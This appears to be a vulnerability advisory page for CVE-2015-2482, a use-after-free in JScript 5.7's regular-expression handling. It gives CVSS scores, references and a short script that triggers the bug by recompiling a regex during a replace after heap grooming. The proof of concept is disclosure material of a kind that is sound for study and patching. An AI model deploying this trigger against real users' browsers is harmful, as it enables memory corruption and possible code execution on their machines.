JScript 5.7 RegExpBase::FBadHeader Use-After-Free

2015.10.16

Credit: SkyLined

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2015-2482

CWE: CWE-119

CVSS Base Score: 9.3/10

Impact Subscore: 10/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

Recompiling the regular expression pattern during a replace can cause
the code
to reuse a freed string, but only if the string is freed from the cache by
allocating and freeing a number of strings of certain size.
CVE-2015-2482:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2482
ZDI-15-515: http://www.zerodayinitiative.com/advisories/ZDI-15-515/
MS15-108: https://technet.microsoft.com/en-us/library/security/MS15-108
Repro:
<script>
var r=new RegExp("A|x|x|xx|xxxxxxxxxxxxxxxxxxxx+", "g");
"A".replace(r, function (){
for (var j = 0; j < 16; j++) new Array(0x1000).join("B");
r.compile();
});
</script>
Repro-in-a-tweet:
https://twitter.com/berendjanwever/status/654048253047140352
Cheers,
SkyLined
Follow me on twitter for a new browser bug every* day!
https://twitter.com/berendjanwever
(* might be more than one some days)

References:

http://www.zerodayinitiative.com/advisories/ZDI-15-515/

https://twitter.com/berendjanwever/status/654048253047140352

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

JScript 5.7 RegExpBase::FBadHeader Use-After-Free

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.